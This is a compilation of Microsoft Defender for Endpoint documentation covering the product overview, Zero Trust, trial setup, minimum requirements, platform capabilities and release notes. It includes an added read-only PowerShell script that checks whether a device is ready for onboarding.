Microsoft Defender for Endpoint documentation
Microsoft Defender for Endpoint delivers preventative protection, post-breach
detection, automated investigation, and response.

Microsoft Defender for Endpoint

OVERVIEW

What is Microsoft Defender for Endpoint?

What is Defender for Endpoint plan 1?

WHAT'S NEW

What's new in Microsoft Defender for Endpoint

Announcing Microsoft Defender for Endpoint Plan 1

VIDEO

Overview video

Evaluate & deploy the service

GET STARTED

Evaluate Microsoft Defender for Endpoint

Plan your deployment

DEPLOY

Deployment guide

Onboard supported devices

Set up and configure Defender for Endpoint Plan 1

HOW-TO GUIDE
Migration guide

VIDEO

Onboarding video

Security operations

OVERVIEW

Endpoint detection and response

Behavioral blocking and containment

Automated investigation and response (AIR)

Advanced hunting

Microsoft Threat Experts

Threat analytics

Use Microsoft Defender for Endpoint on other platforms

OVERVIEW

Microsoft Defender for Endpoint on Mac

Microsoft Defender for Endpoint on iOS

Microsoft Defender for Endpoint on Linux

Microsoft Defender for Endpoint on Android

Reference

REFERENCE

Management and APIs

Partner integration

Security administration

OVERVIEW

Microsoft Defender Vulnerability Management

Attack surface reduction

Next-generation protection


Microsoft Defender for Endpoint
Article • 01/19/2024

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender Vulnerability Management
Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Microsoft Defender for Endpoint is an enterprise endpoint security platform designed to help enterprise networks prevent, detect, investigate, and respond to advanced threats.

Note

Example endpoints may include laptops, phones, tablets, PCs, access points, routers, and firewalls.

Tip

Microsoft Defender for Endpoint is available in two plans, Defender for Endpoint Plan 1 and Plan 2. A new Microsoft Defender Vulnerability Management add-on is now available for Plan 2.

For more information on the features and capabilities included in each plan, including the new Defender Vulnerability Management add-on, see Microsoft 365 guidance for security & compliance.

Watch the following video to learn more about Defender for Endpoint:
https://www.microsoft.com/en-us/videoplayer/embed/RE4wDob?postJsllMsg=true

Defender for Endpoint uses the following combination of technology built into Windows
10 and Microsoft's robust cloud service:

Endpoint behavioral sensors: Embedded in Windows 10, these sensors collect and
process behavioral signals from the operating system and send this sensor data to
your private, isolated, cloud instance of Microsoft Defender for Endpoint.
Cloud security analytics: Leveraging big-data, device learning, and unique
Microsoft optics across the Windows ecosystem, enterprise cloud products (such
as Office 365), and online assets, behavioral signals are translated into insights,
detections, and recommended responses to advanced threats.

Threat intelligence: Generated by Microsoft hunters, security teams, and augmented by threat intelligence provided by partners, threat intelligence enables Defender for Endpoint to identify attacker tools, techniques, and procedures, and generate alerts when they are observed in collected sensor data.

Microsoft Defender for Endpoint capabilities:

Core Defender Vulnerability Management | Attack surface reduction | Next-generation protection | Endpoint detection and response | Automated investigation and remediation | Microsoft Threat Experts

Centralized configuration and administration, APIs

Microsoft Defender XDR

https://www.microsoft.com/en-us/videoplayer/embed/RE4vnC4?rel=0&postJsllMsg=true

Tip

Learn about the latest enhancements in Defender for Endpoint: What's new in Microsoft Defender for Endpoint.
Microsoft Defender for Endpoint demonstrated industry-leading optics and detection capabilities in the recent MITRE evaluation. Read: Insights from the MITRE ATT&CK-based evaluation.

Important
The capabilities on non-Windows platforms may be different from the ones for
Windows. For more information on what capabilities are available for non-Windows
platforms, see Microsoft Defender for Endpoint for non-Windows platforms.

Core Defender Vulnerability Management

Built-in core vulnerability management capabilities use a modern risk-based approach to the discovery, assessment, prioritization, and remediation of endpoint vulnerabilities and misconfigurations. To further enhance your ability to assess your security posture and reduce risk, a new Defender Vulnerability Management add-on for Plan 2 is available.

For more information on the different vulnerability management capabilities available to you, see Compare Microsoft Defender Vulnerability Management offerings.

Attack surface reduction

The attack surface reduction set of capabilities provides the first line of defense in the
stack. By ensuring configuration settings are properly set and exploit mitigation
techniques are applied, the capabilities resist attacks and exploitation. This set of
capabilities also includes network protection and web protection, which regulate access
to malicious IP addresses, domains, and URLs.

Next-generation protection

To further reinforce the security perimeter of your network, Microsoft Defender for
Endpoint uses next-generation protection designed to catch all types of emerging
threats.

Endpoint detection and response

Endpoint detection and response capabilities are put in place to detect, investigate, and
respond to advanced threats that may have made it past the first two security pillars.
Advanced hunting provides a query-based threat-hunting tool that lets you proactively
find breaches and create custom detections.

Automated investigation and remediation

In conjunction with being able to quickly respond to advanced attacks, Microsoft Defender for Endpoint offers automatic investigation and remediation capabilities that help reduce the volume of alerts in minutes at scale.

Microsoft Secure Score for Devices

Defender for Endpoint includes Microsoft Secure Score for Devices to help you
dynamically assess the security state of your enterprise network, identify unprotected
systems, and take recommended actions to improve the overall security of your
organization.

Microsoft Threat Experts

Microsoft Defender for Endpoint's new managed threat hunting service provides
proactive hunting, prioritization, and additional context and insights that further
empower Security operation centers (SOCs) to identify and respond to threats quickly
and accurately.

Important

Defender for Endpoint customers need to apply for the Microsoft Threat Experts
managed threat hunting service to get proactive Targeted Attack Notifications and
to collaborate with experts on demand. Experts on Demand is an add-on service.
Targeted Attack Notifications are always included after you have been accepted
into Microsoft Threat Experts managed threat hunting service.

If you are not enrolled yet and would like to experience its benefits, go to Settings > General > Advanced features > Microsoft Threat Experts to apply. Once accepted, you will get the benefits of Targeted Attack Notifications, and start a 90-day trial of Experts on Demand. Contact your Microsoft representative to get a full Experts on Demand subscription.

Centralized configuration and administration, APIs

Integrate Microsoft Defender for Endpoint into your existing workflows.

Integration with Microsoft solutions

Defender for Endpoint directly integrates with various Microsoft solutions, including:

Microsoft Defender for Cloud
Microsoft Sentinel
Intune
Microsoft Defender for Cloud Apps
Microsoft Defender for Identity
Microsoft Defender for Office
Skype for Business

Microsoft Defender XDR

With Microsoft Defender XDR, Defender for Endpoint and various Microsoft security solutions form a unified pre- and post-breach enterprise defense suite that natively integrates across endpoint, identity, email, and applications to detect, prevent, investigate, and automatically respond to sophisticated attacks.

Tip

Do you want to learn more? Engage with the Microsoft Security community in our Tech Community: Microsoft Defender for Endpoint Tech Community.


Zero Trust with Microsoft Defender for
Endpoint
Article • 11/17/2023

Note

Want to experience Microsoft Defender XDR? Learn more about how you can
evaluate and pilot Microsoft Defender XDR.

Applies to:

Microsoft Defender XDR for Endpoint

Microsoft Defender for Endpoint is an enterprise endpoint security platform designed to help enterprise networks prevent, detect, investigate, and respond to advanced threats.

Zero Trust is a security strategy for designing and implementing the following set of
security principles:

Verify explicitly: Always authenticate and authorize based on all available data points.

Use least privilege access: Limit user access with Just-In-Time and Just-Enough-Access (JIT/JEA), risk-based adaptive policies, and data protection.

Assume breach: Minimize blast radius and segment access. Verify end-to-end encryption and use analytics to get visibility, drive threat detection, and improve defenses.

Defender for Endpoint is a primary component of the Assume breach principle and an
important element of your extended detection and response (XDR) deployment with
Microsoft Defender XDR.

Defender for Endpoint uses the following combination of technologies built into
Windows 10 and 11 and Microsoft's robust cloud service:

Endpoint behavioral sensors: Sensors embedded in Windows 10 and 11 collect and process behavioral signals from the operating system and send this sensor data to your private, isolated, cloud instance of Microsoft Defender for Endpoint.

Cloud security analytics: Defender for Endpoint translates behavioral signals into
insights, detections, and recommended responses to advanced threats. Defender
for Endpoint uses big-data, device learning, and unique Microsoft optics across the
Windows ecosystem and enterprise cloud products such as Microsoft 365.

Threat intelligence: With data generated by Microsoft hunters, security teams, and partners, threat intelligence enables Defender for Endpoint to identify attacker tools, techniques, and procedures, and generate alerts when they are observed in collected sensor data.

Defender for Endpoint and other Microsoft security solutions form a unified pre- and
post-breach enterprise defense suite for Microsoft Defender XDR. This native integration
across endpoints, identity, email, and applications allows you to detect, prevent,
investigate, and automatically respond to sophisticated attacks.

Threat protection for Zero Trust

Defender for Endpoint provides the following threat protections:

Core Defender Vulnerability Management, which uses a modern risk-based approach to the discovery, assessment, prioritization, and remediation of endpoint vulnerabilities and misconfigurations.
Attack surface reduction provides the first line of defense in the stack. By ensuring
configuration settings are properly set and exploit mitigation techniques are
applied, the capabilities resist attacks and exploitation.
Next-generation protection is designed to catch all types of emerging threats.
Endpoint detection and response detect, investigate, and respond to advanced
threats that may have made it past the first two security pillars. Advanced hunting
provides a query-based threat-hunting tool that lets you proactively find breaches
and create custom detections.
Automated investigation and remediation help reduce the volume of alerts in
minutes at scale.
Microsoft Secure Score for Devices helps you dynamically assess the security state
of your enterprise network, identify unprotected systems, and take recommended
actions to improve the overall security of your organization.
Microsoft Threat Experts provides proactive hunting, prioritization, and additional
context and insights that further empower security operation centers (SOCs) to
identify and respond to threats quickly and accurately.

Next steps
Learn more about Zero Trust and how to build an enterprise-scale strategy and
architecture with the Zero Trust Guidance Center.
For endpoint protection concepts and deployment objectives, see Secure endpoints with
Zero Trust.

For the steps to deploy Intune for Microsoft 365 with Zero Trust, see the Manage
devices with Intune and Microsoft 365 solution guidance.

For other Microsoft 365 capabilities that contribute to a strong Zero Trust strategy and
architecture, see Zero Trust deployment plan with Microsoft 365.

For an overview of Zero Trust for Microsoft Defender XDR services, see Zero Trust with Microsoft Defender XDR.

Tip

Do you want to learn more? Engage with the Microsoft Security community in our Tech Community: Microsoft Defender for Endpoint Tech Community.


Trial user guide: Microsoft Defender for
Endpoint
Article • 10/20/2023

Welcome to the Microsoft Defender for Endpoint Plan 2 trial user guide!

This playbook is a simple guide to help you make the most of your free trial. Using the
suggested steps in this article from the Microsoft Defender team, you'll learn how
Defender for Endpoint can help you to prevent, detect, investigate, and respond to
advanced threats.

What is Defender for Endpoint?

Defender for Endpoint is an enterprise endpoint security platform that uses the following combination of technology built into Windows and Microsoft's robust cloud service:

Endpoint behavioral sensors: Embedded in Windows, these sensors collect and process behavioral signals from the operating system and send sensor data to your private, isolated, cloud instance of Defender for Endpoint.

Cloud security analytics: Using big data, device learning, and unique Microsoft
optics across the Windows ecosystem, enterprise cloud products (such as
Microsoft 365), and online assets, behavioral signals are translated into insights,
detections, and recommended responses to advanced threats.

Threat intelligence: Generated by Microsoft hunters and security teams, and augmented by threat intelligence provided by partners, threat intelligence enables Defender for Endpoint to identify attacker tools, techniques, and procedures, and generate alerts when they're observed in collected sensor data.

Microsoft Defender for Endpoint capabilities:

Core Defender Vulnerability Management | Attack surface reduction | Next-generation protection | Endpoint detection and response | Automated investigation and remediation | Microsoft Threat Experts

Centralized configuration and administration, APIs

Microsoft Defender XDR

Let's get started!

Set up your trial

1. Confirm your license state.
2. Set up role-based access control and grant permissions to your security team.
3. Visit the Microsoft Defender portal.
4. Onboard endpoints using any of the supported management tools.
5. Configure capabilities.
6. Experience Microsoft Defender for Endpoint through simulated attacks.
7. Set up the Microsoft Defender for Endpoint evaluation lab.

Step 1: Confirm your license state

To make sure your Defender for Endpoint subscription is properly provisioned, you can check your license state in either the Microsoft 365 admin center (https://admin.microsoft.com) or Microsoft Entra ID (https://portal.azure.com).

Check your license state.

Step 2: Set up role-based access control and grant permissions to your security team

Microsoft recommends using the concept of least privileges. Defender for Endpoint uses built-in roles within Microsoft Entra ID. Review the different roles that are available and choose appropriate roles for your security team. Some roles may need to be applied temporarily and removed after the trial has been completed.

Use Privileged Identity Management to manage your roles to provide extra auditing,
control, and access review for users with directory permissions.

Defender for Endpoint supports two ways to manage permissions:

Basic permissions management: Set permissions to either full access or read-only. Users with Global Administrator or Security Administrator roles in Microsoft Entra ID have full access. The Security reader role has read-only access and doesn't grant access to view machines/device inventory.

Role-based access control (RBAC): Set granular permissions by defining roles, assigning Microsoft Entra user groups to the roles, and granting the user groups access to device groups. For more information, see Manage portal access using role-based access control.

Note

Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.

Step 3: Visit the Microsoft Defender portal

The Microsoft Defender portal (https://security.microsoft.com) is where you can access your Defender for Endpoint capabilities.

1. Review what to expect in the Microsoft Defender portal.

2. Go to https://security.microsoft.com and sign in.

3. In the navigation pane, see the Endpoints section to access your capabilities.

Step 4: Onboard endpoints using any of the supported management tools

This section outlines the general steps to onboard devices (endpoints).

1. Watch this video for a quick overview of the onboarding process and learn about
the available tools and methods.

2. Review your device onboarding tool options and select the most appropriate
option for your environment.

Step 5: Configure capabilities

After onboarding devices (endpoints), you'll configure the various capabilities, such as endpoint detection and response, next-generation protection, and attack surface reduction.

Use this table to choose components to configure. We recommend configuring all available capabilities, but you're able to skip the ones that don't apply.

Step 6: Experience Microsoft Defender for Endpoint through simulated attacks

You might want to experience Defender for Endpoint before you onboard more than a
few devices to the service. To do this, you can run controlled attack simulations on a few
test devices. After running the simulated attacks, you can review how Defender for
Endpoint surfaces malicious activity and explore how it enables an efficient response.

To run any of the provided simulations, you need at least one onboarded device.

1. Access the tutorials. In the Microsoft Defender portal (https://security.microsoft.com), in the navigation pane, under Endpoints, choose Tutorials.

2. Read the walkthrough document provided with each attack scenario. Each
document includes OS and application requirements and detailed instructions that
are specific to an attack scenario.

3. Run a simulation.

Step 7: Set up the Microsoft Defender for Endpoint evaluation lab

The Microsoft Defender for Endpoint evaluation lab is designed to eliminate the
complexities of device and environment configuration so that you can focus on
evaluating the capabilities of the platform, running simulations, and seeing the
prevention, detection, and remediation features in action. Using the simplified set-up
experience in evaluation lab, you can focus on running your own test scenarios and the
pre-made simulations to see how Defender for Endpoint performs.

Watch the video overview of the evaluation lab

Get started with the lab

See also

Defender for Endpoint technical documentation
Microsoft Security technical content library
Defender for Endpoint demonstration

Tip

Do you want to learn more? Engage with the Microsoft Security community in our Tech Community: Microsoft Defender for Endpoint Tech Community.


Minimum requirements for Microsoft
Defender for Endpoint
Article • 11/15/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

There are some minimum requirements for onboarding devices to the Defender for Endpoint service. Learn about the licensing, hardware and software requirements, and other configuration settings to onboard devices to the service.

Tip

Learn about the latest enhancements in Defender for Endpoint: Defender for Endpoint Tech Community.
Defender for Endpoint demonstrated industry-leading optics and detection capabilities in the recent MITRE evaluation. Read: Insights from the MITRE ATT&CK-based evaluation.
If you're looking for endpoint protection for small and medium-sized businesses, see Microsoft Defender for Business and Defender for Business requirements.

Licensing requirements

Defender for Endpoint Plan 1 and Plan 2 (standalone or as part of other Microsoft 365 plans)

Microsoft Defender for Business (for small and medium-sized businesses)

To onboard servers to the standalone versions of Defender for Endpoint, server licenses are required. You can choose from:
Microsoft Defender for Servers Plan 1 or Plan 2 (as part of the Defender for Cloud offering)
Microsoft Defender for Endpoint for Servers
Microsoft Defender for Business servers (for small and medium-sized businesses only)

For more detailed information about licensing requirements for Microsoft Defender for
Endpoint, see Microsoft Defender for Endpoint licensing information.

For detailed licensing information, see the Product Terms site and work with your
account team to learn more about the terms and conditions.

Browser requirements
Access to Defender for Endpoint is done through a browser. The following browsers are
supported:

Microsoft Edge
Google Chrome

Note

Although other browsers might work, the mentioned browsers are the ones
supported.

Hardware and software requirements

Devices on your network must be running one of these editions. New features or capabilities are typically provided only on operating systems that haven't yet reached the end of their support lifecycle. For more information, see Supported Microsoft Defender for Endpoint capabilities by platform. Microsoft recommends the installation of the latest available security patches for any operating system.

Supported Windows versions

Windows 11 Enterprise
Windows 11 IoT Enterprise
Windows 11 Education
Windows 11 Pro
Windows 11 Pro Education
Windows 10 Enterprise
Windows 10 Enterprise LTSC 2016 (or later)
Windows 10 IoT Enterprise (including LTSC)
Windows 10 Education
Windows 10 Pro
Windows 10 Pro Education

Windows Server
Windows Server 2012 R2
Windows Server 2016
Windows Server, version 1803 or later
Windows Server 2019 and later
Windows Server 2019 core edition
Windows Server 2022
Windows Server 2022 core edition

Azure Virtual Desktop

Windows 365 running one of the above operating systems/versions

The following operating systems require the use of the Log Analytics / Microsoft Monitoring Agent (MMA) to work with Defender for Endpoint:

Windows 8.1 Enterprise
Windows 8.1 Pro
Windows 7 SP1 Enterprise
Windows 7 SP1 Pro
Windows Server 2008 R2 SP1

To add antimalware protection to these older operating systems, you can use System
Center Endpoint Protection.

Other supported operating systems

macOS
Linux
Windows Subsystem for Linux
Android
iOS

Note

You'll need to confirm the Linux distributions and versions of Android, iOS, and macOS are compatible with Defender for Endpoint.
While Windows 10 IoT Enterprise is a supported OS in Microsoft Defender for Endpoint and enables OEMs/ODMs to distribute it as part of their product or solution, customers should follow the OEM/ODM's guidance around host-based installed software and supportability.
Endpoints running mobile versions of Windows (such as Windows CE and Windows 10 Mobile) aren't supported.
Virtual Machines running Windows 10 Enterprise 2016 LTSB can encounter performance issues when used on non-Microsoft virtualization platforms. For virtual environments, we recommend using Windows 10 Enterprise LTSC 2019 or later.
The standalone versions of Defender for Endpoint Plan 1 and Plan 2 do not include server licenses. To onboard servers to those plans, you'll need an additional license, such as Microsoft Defender for Servers Plan 1 or Plan 2 (as part of the Defender for Cloud offering). To learn more, see Defender for Endpoint onboarding Windows Server.
If your organization is a small or medium-sized business, see Microsoft Defender for Business requirements.

Hardware requirements

The minimum hardware requirements for Defender for Endpoint on Windows devices are the same as the requirements for the operating system itself (that is, they aren't in addition to the requirements for the operating system).

Cores: 2 minimum, 4 preferred
Memory: 1 GB minimum, 4 GB preferred

Network and data storage and configuration requirements

When you run the onboarding wizard for the first time, you must choose where your Microsoft Defender for Endpoint-related information is stored: in the European Union, the United Kingdom, or the United States datacenter.

Note

You cannot change your data storage location after the first-time setup.
Review the Microsoft Defender for Endpoint data storage and privacy for more information on where and how Microsoft stores your data.

IP stack

The IPv4 (Internet Protocol Version 4) stack must be enabled on devices for communication to the Defender for Endpoint cloud service to work as expected.

Alternatively, if you must use an IPv6-only configuration, consider adding dynamic IPv6/IPv4 transitional mechanisms, such as DNS64/NAT64, to ensure end-to-end IPv6 connectivity to Microsoft 365 without any other network reconfiguration.

Internet connectivity

Internet connectivity on devices is required either directly or through proxy.

For more information on other proxy configuration settings, see Configure device proxy
and Internet connectivity settings.

Microsoft Defender Antivirus configuration requirement

The Defender for Endpoint agent depends on Microsoft Defender Antivirus to scan files and provide information about them.

Configure Security intelligence updates on the Defender for Endpoint devices whether
Microsoft Defender Antivirus is the active antimalware solution or not. For more
information, see Manage Microsoft Defender Antivirus updates and apply baselines.

When Microsoft Defender Antivirus isn't the active antimalware in your organization and
you use the Defender for Endpoint service, Microsoft Defender Antivirus goes into
passive mode.

If your organization has turned off Microsoft Defender Antivirus through Group Policy or
other methods, devices that are onboarded must be excluded from the Group Policy.
If you're onboarding servers and Microsoft Defender Antivirus isn't the active
antimalware on your servers, configure Microsoft Defender Antivirus to run in passive
mode or uninstall it. The configuration is dependent on the server version. For more
information, see Microsoft Defender Antivirus compatibility.

Note

Your regular Group Policy doesn't apply to Tamper Protection, and changes to
Microsoft Defender Antivirus settings will be ignored when Tamper Protection is on.
See What happens when tamper protection is turned on?

Microsoft Defender Antivirus Early Launch Antimalware (ELAM) driver is enabled

If you're running Microsoft Defender Antivirus as the primary antimalware product on your devices, the Defender for Endpoint agent will successfully onboard.

If you're running a third-party antimalware client and use Mobile Device Management
solutions or Microsoft Configuration Manager (current branch), you need to ensure the
Microsoft Defender Antivirus ELAM driver is enabled. For more information, see Ensure
that Microsoft Defender Antivirus isn't disabled by policy.
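The following read-only script ties together the hardware, IP stack, Microsoft Defender Antivirus configuration and ELAM requirements above into one pre-onboarding check. It is an added example, not Microsoft's code. It assumes the Defender Antivirus ELAM driver is the WdBoot system driver and that the sensor runs as the Sense service and records its onboarding state under the Windows Advanced Threat Protection registry key; the supported-edition pattern is constructed from the version list above.

```powershell
# Added readiness check (example code, not from the Microsoft documentation).
# It only reads system state and changes nothing. Run in an elevated PowerShell session.

function New-CheckResult {
    param([string]$Check, [bool]$Pass, [string]$Detail)
    [pscustomobject]@{ Check = $Check; Pass = $Pass; Detail = $Detail }
}

function Test-MdeOnboardingReadiness {
    [CmdletBinding()]
    param(
        # Minimums from the Hardware requirements section.
        [int]$MinCores = 2,
        [double]$MinMemoryGB = 1
    )
    $r = [System.Collections.Generic.List[object]]::new()

    # 1. Operating system edition. The pattern is constructed from the supported-versions
    #    list; the older editions that need the MMA agent are flagged separately.
    $os = Get-CimInstance -ClassName Win32_OperatingSystem
    $modern = $os.Caption -match 'Windows 1[01] (IoT )?(Enterprise|Education|Pro)|Windows Server (2012 R2|2016|2019|2022)'
    $legacy = $os.Caption -match 'Windows (7|8\.1)|Server 2008 R2'
    $detail = if ($legacy) { "$($os.Caption): requires the Log Analytics / MMA agent" } else { $os.Caption }
    $r.Add((New-CheckResult 'Supported OS edition' ($modern -or $legacy) $detail))

    # 2. CPU cores and memory (the documented minimums are the OS minimums themselves).
    $cores = (Get-CimInstance -ClassName Win32_Processor | Measure-Object -Property NumberOfCores -Sum).Sum
    $r.Add((New-CheckResult "Cores >= $MinCores" ($cores -ge $MinCores) "$cores core(s)"))
    $memGB = [math]::Round($os.TotalVisibleMemorySize / 1MB, 1)   # TotalVisibleMemorySize is in KB
    $r.Add((New-CheckResult "Memory >= $MinMemoryGB GB" ($memGB -ge $MinMemoryGB) "$memGB GB"))

    # 3. IPv4 stack bound to at least one adapter (ms_tcpip is the IPv4 binding component).
    $ipv4 = @(Get-NetAdapterBinding -ComponentID ms_tcpip -ErrorAction SilentlyContinue | Where-Object Enabled)
    $r.Add((New-CheckResult 'IPv4 enabled on an adapter' ($ipv4.Count -gt 0) "$($ipv4.Count) adapter(s) with IPv4 bound"))

    # 4. Microsoft Defender Antivirus state: service enabled, running mode (Normal or Passive),
    #    signature freshness (updates are required even in passive mode) and tamper protection.
    try {
        $mp = Get-MpComputerStatus -ErrorAction Stop
        $r.Add((New-CheckResult 'Defender AV service enabled' $mp.AMServiceEnabled "Running mode: $($mp.AMRunningMode)"))
        $r.Add((New-CheckResult 'Security intelligence fresh (<= 7 days)' ($mp.AntivirusSignatureAge -le 7) "Signature age: $($mp.AntivirusSignatureAge) day(s)"))
        $r.Add((New-CheckResult 'Tamper protection on' $mp.IsTamperProtected 'Policy changes to Defender AV settings are ignored while on'))
    } catch {
        $r.Add((New-CheckResult 'Defender AV queryable' $false "Get-MpComputerStatus failed: $($_.Exception.Message)"))
    }

    # 5. Defender AV not switched off by Group Policy (the DisableAntiSpyware policy value).
    $pol = Get-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' -Name DisableAntiSpyware -ErrorAction SilentlyContinue
    $disabled = ($null -ne $pol) -and ($pol.DisableAntiSpyware -eq 1)
    $r.Add((New-CheckResult 'Defender AV not disabled by policy' (-not $disabled) $(if ($disabled) { 'DisableAntiSpyware = 1' } else { 'No disabling policy found' })))

    # 6. ELAM driver. Assumption: the Defender AV early-launch driver is the WdBoot system driver.
    $elam = Get-CimInstance -ClassName Win32_SystemDriver -Filter "Name='WdBoot'" -ErrorAction SilentlyContinue
    $r.Add((New-CheckResult 'Defender ELAM driver (WdBoot) boot-start' ($null -ne $elam -and $elam.StartMode -eq 'Boot') $(if ($elam) { "StartMode: $($elam.StartMode), State: $($elam.State)" } else { 'Driver not found' })))

    # 7. Informational: is the device already onboarded? Assumption: the Defender for Endpoint
    #    sensor runs as the 'Sense' service and records OnboardingState under the key below.
    $sense = Get-Service -Name Sense -ErrorAction SilentlyContinue
    $state = Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows Advanced Threat Protection\Status' -Name OnboardingState -ErrorAction SilentlyContinue
    $onboarded = ($null -ne $sense) -and ($sense.Status -eq 'Running') -and ($state.OnboardingState -eq 1)
    $r.Add((New-CheckResult 'Already onboarded (informational)' $onboarded $(if ($sense) { "Sense service: $($sense.Status)" } else { 'Sense service not present' })))

    return $r
}

$report = Test-MdeOnboardingReadiness
$report | Format-Table -AutoSize
if ($report | Where-Object { -not $_.Pass -and $_.Check -notlike '*informational*' }) {
    Write-Warning 'One or more prerequisites are not met; review the failed checks before onboarding.'
}
```

A third-party antimalware product will show a Passive Mode running mode with the service still enabled, which is the expected state described above, not a failure.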

Related articles

Set up Microsoft Defender for Endpoint deployment
Onboard devices

Tip

Do you want to learn more? Engage with the Microsoft Security community in our Tech Community: Microsoft Defender for Endpoint Tech Community.


Supported Microsoft Defender for
Endpoint capabilities by platform
Article • 02/12/2024

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Defender for Endpoint? Sign up for a free trial.

Learn how to Onboard devices and configure Microsoft Defender for Endpoint
capabilities.

The following table gives information about the supported Microsoft Defender for
Endpoint capabilities by platform.

Operating System: Windows 10 & 11 | Windows Server 2012 R2 [1], 2016 [1], 2019 & 2022, 1803+ | macOS | Linux

Prevention

Attack Surface Reduction
Device Control
Firewall
Network Protection [2] [2]
Next-generation protection
Tamper Protection
Web Protection [2] [2]

Detection

Advanced Hunting
Custom file indicators
Custom network indicators [2] [2]
EDR Block
Passive Mode
Sense detection sensor
Endpoint & network device discovery
Vulnerability management

Response

Automated Investigation & Response (AIR)
Device response capabilities: collect investigation package [3] [3]
Device response capabilities: run AV scan
Device isolation
File response capabilities: collect file, deep analysis, block file, stop, and quarantine processes
Live Response
[1] Refers to the modern, unified solution for Windows Server 2012 R2 and 2016. For more information, see Onboard Windows Servers to the Defender for Endpoint service.

[2] Feature is currently in preview (Microsoft Defender for Endpoint preview features).

[3] Response capabilities using Live Response [2]

[4] Collect file only, using Live Response [2]

Note

Windows 7, 8.1, Windows Server 2008 R2 include support for the EDR sensor, and AV using System Center Endpoint Protection (SCEP).

Tip

Do you want to learn more? Engage with the Microsoft Security community in our Tech Community: Microsoft Defender for Endpoint Tech Community.


What's new in Microsoft Defender for
Endpoint
Article • 01/24/2024

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Defender for Endpoint? Sign up for a free trial.

The following features are in preview or generally available (GA) in the latest release of
Microsoft Defender for Endpoint.

For more information on preview features, see Preview features.

For more information on what's new with Microsoft Defender for Endpoint on Windows,
see: What's new in Microsoft Defender for Endpoint on Windows

For more information on what's new with other Microsoft Defender security products,
see:

What's new in Microsoft Defender XDR
What's new in Microsoft Defender for Office 365
What's new in Microsoft Defender for Identity
What's new in Microsoft Defender for Cloud Apps

For more information on Microsoft Defender for Endpoint on specific operating systems:

What's new in Defender for Endpoint on Windows
What's new in Defender for Endpoint on macOS
What's new in Defender for Endpoint on Linux
What's new in Defender for Endpoint on Android
What's new in Defender for Endpoint on iOS

January 2024
- Defender Boxed is available for a limited period of time. Defender Boxed highlights your organization's security successes, improvements, and response actions during 2023. Take a moment to celebrate your organization's improvements in security posture, overall response to detected threats (manual and automatic), blocked emails, and more.
  - Defender Boxed opens automatically when you go to the Incidents page in the Microsoft Defender portal.
  - If you close Defender Boxed and you want to reopen it, in the Microsoft Defender portal, go to Incidents, and then select Your Defender Boxed.
  - Act quickly! Defender Boxed is available only for a short period of time.

November 2023
- Microsoft Defender Core service is now available for consumers and is planned to begin rolling out to enterprise customers in early 2024.
- The Microsoft Defender for Endpoint plug-in for Windows Subsystem for Linux (WSL) is now available in public preview.
- Support for mixed-license scenarios is now generally available in Defender for Endpoint.

October 2023
- (GA) The device isolation and run AV scan response actions on macOS and Linux are now generally available. You can now remotely run an AV scan or isolate devices when responding to attacks.
- (Public Preview) Streamlined device connectivity for Defender for Endpoint is available in public preview for Windows, macOS, and Linux. This experience makes it easier to configure and manage Defender for Endpoint services by reducing the number of URLs required for connectivity, providing IP and Azure service tag support, and simplifying post-deployment network management.
- (Public Preview) User Contain can now automatically contain compromised user accounts, stopping human-operated ransomware in its tracks by using automatic attack disruption.

September 2023
- (GA) Protecting Dev Drive using performance mode is now generally available. Performance mode reduces the performance impact of Microsoft Defender Antivirus scans for files stored on a designated Dev Drive, improving functional performance for developers who use Windows 11.

August 2023
- (GA) The monthly security summary report is now generally available. The report gives organizations a visual summary of key findings and of the preventative actions completed in the last month to improve the organization's overall security posture.

July 2023
- The eBPF-based sensor for Microsoft Defender for Endpoint on Linux is available for public preview on all supported Linux devices. For more information, see Use eBPF-based sensor for Microsoft Defender for Endpoint on Linux.
- Manage endpoint security policies in Defender for Endpoint is now in public preview. You can now configure security settings directly in Microsoft Defender XDR.
- A new file page is now available in Defender for Endpoint. The file page now includes information like file details and file content and capabilities. For more information, see Investigate files.

June 2023
- Microsoft Defender Antivirus scan response action is supported for macOS and Linux for client version 101.98.84 and above. It is in preview. See Run Microsoft Defender Antivirus scan on devices.
- Isolating devices from the network is supported for macOS for client version 101.98.84 and above. It is in preview. See Isolate devices from the network.
- Forcibly releasing devices from isolation is now available for public preview. This new capability allows you to forcibly release devices from isolation when isolated devices become unresponsive. For more information, see Forcibly release device from isolation.

May 2023
- Performance mode for Microsoft Defender Antivirus is now available for public preview. This new capability provides asynchronous scanning on a Dev Drive, and doesn't change the security posture of your system drive or other drives. For more information, see Protecting Dev Drive using performance mode.

March 2023
- Support for mixed-licensing scenarios is now in preview. With these capabilities, you can Manage Microsoft Defender for Endpoint subscription settings across client devices (preview).

February 2023
- The Microsoft Defender for Identity integration toggle is now removed from the Microsoft Defender for Endpoint Settings > Advanced features page. Because Defender for Identity is now integrated with Microsoft Defender XDR, this toggle is no longer required. You don't need to manually configure integration between services. See What's new - Microsoft Defender for Identity.

January 2023
- Tamper protection can now protect exclusions when deployed with Microsoft Intune. See Protect Microsoft Defender Antivirus exclusions from tampering.
- Live Response is now generally available for macOS and Linux. For more information, see Investigate entities on devices using live response.
- The live response API and library API for Linux and macOS are now generally available. You can now run live response API commands on Linux and macOS.

December 2022
- Microsoft Defender for Endpoint device control removable storage access control updates:
  1. Microsoft Intune support for removable storage access control is now available. See Deploy and manage device control with Intune.
  2. The new default enforcement policy of removable storage access control is designed for all device control features. Printer Protection is now available for this policy. If you create a Default Deny policy, printers will be blocked in your organization.
     - Intune: ./Vendor/MSFT/Defender/Configuration/DefaultEnforcement. See Deploy and manage device control using Intune.
